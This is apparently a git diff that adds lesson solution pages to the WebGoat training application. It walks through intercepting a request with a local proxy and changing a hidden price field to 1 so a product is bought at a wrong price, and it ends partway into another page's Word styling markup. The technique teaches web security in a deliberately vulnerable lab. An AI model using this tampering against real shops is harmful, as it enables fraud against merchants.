+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Exploit Hidden Fields <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Developers
+will use hidden fields for tracking, login, pricing, etc.. information on a
+loaded page. While this is a convenient and easy mechanism for the developer,
+they often don't validate the information that is received from the hidden
+field. This lesson will teach the attacker to find and modify hidden fields to
+obtain a product for a price other than the price specified <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to exploit a hidden field to obtain a product at an incorrect
+price.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_103" o:spid="_x0000_i1029" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image011.jpg" v:shapes="Picture_x0020_103"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 4<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To change the
+hidden field you need to start your favorite HTTP Interceptor. You can use
+WebScarab from OWASP to intercept the request and change the hidden field.
+Configure your browser to use a local proxy. In Internet Explorer you can do
+this via “Tools” – “Internet Options” – “Connections” – “LAN Settings”. You
+must define proxy “localhost” with port 8008.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_104"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:4in;height:254.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=384 height=339
+src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image012.jpg" v:shapes="Picture_x0020_104"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>2</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Set local proxy in Internet Explorer<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Start
+WebScarab <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_105"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image013.jpg" v:shapes="Picture_x0020_105"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>3</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Intercept request with WebScarab<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_106"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image014.jpg" v:shapes="Picture_x0020_106"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>4</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Change the Price variable to 1<o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_107"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image015.jpg" v:shapes="Picture_x0020_107"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>5</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 4 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/filelist.xml b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/filelist.xml
new file mode 100644
index 000000000..a94e9430b
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/filelist.xml
@@ -0,0 +1,16 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../HiddenFieldTampering.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image014.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image001.png b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image001.png
new file mode 100644
index 000000000..3757d471d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image003.png b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image003.png
new file mode 100644
index 000000000..e3ba2d5cd
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image005.png b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image005.png
new file mode 100644
index 000000000..1f0d5ebef
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image007.png b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image007.png
new file mode 100644
index 000000000..a715a8db2
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image009.png b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image009.png
new file mode 100644
index 000000000..2914f15ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image011.jpg b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image011.jpg
new file mode 100644
index 000000000..06d8b5434
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image012.jpg b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image012.jpg
new file mode 100644
index 000000000..3be37d0cf
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image013.jpg b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image013.jpg
new file mode 100644
index 000000000..7feef4395
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image014.jpg b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image014.jpg
new file mode 100644
index 000000000..6bbe14316
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image014.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image015.jpg b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image015.jpg
new file mode 100644
index 000000000..02de6c5eb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/themedata.thmx b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HiddenFieldTampering_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues.html b/main/project/WebContent/lesson_solutions/HtmlClues.html
new file mode 100644
index 000000000..6bcefd9a7
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HtmlClues.html
@@ -0,0 +1,677 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/HtmlClues_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HtmlClues_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>5</o:Revision>
+  <o:TotalTime>10</o:TotalTime>
+  <o:Created>2007-07-11T10:33:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:27:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>123</o:Words>
+  <o:Characters>707</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>5</o:Lines>
+  <o:Paragraphs>1</o:Paragraphs>
+  <o:CharactersWithSpaces>829</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/HtmlClues_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HtmlClues_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
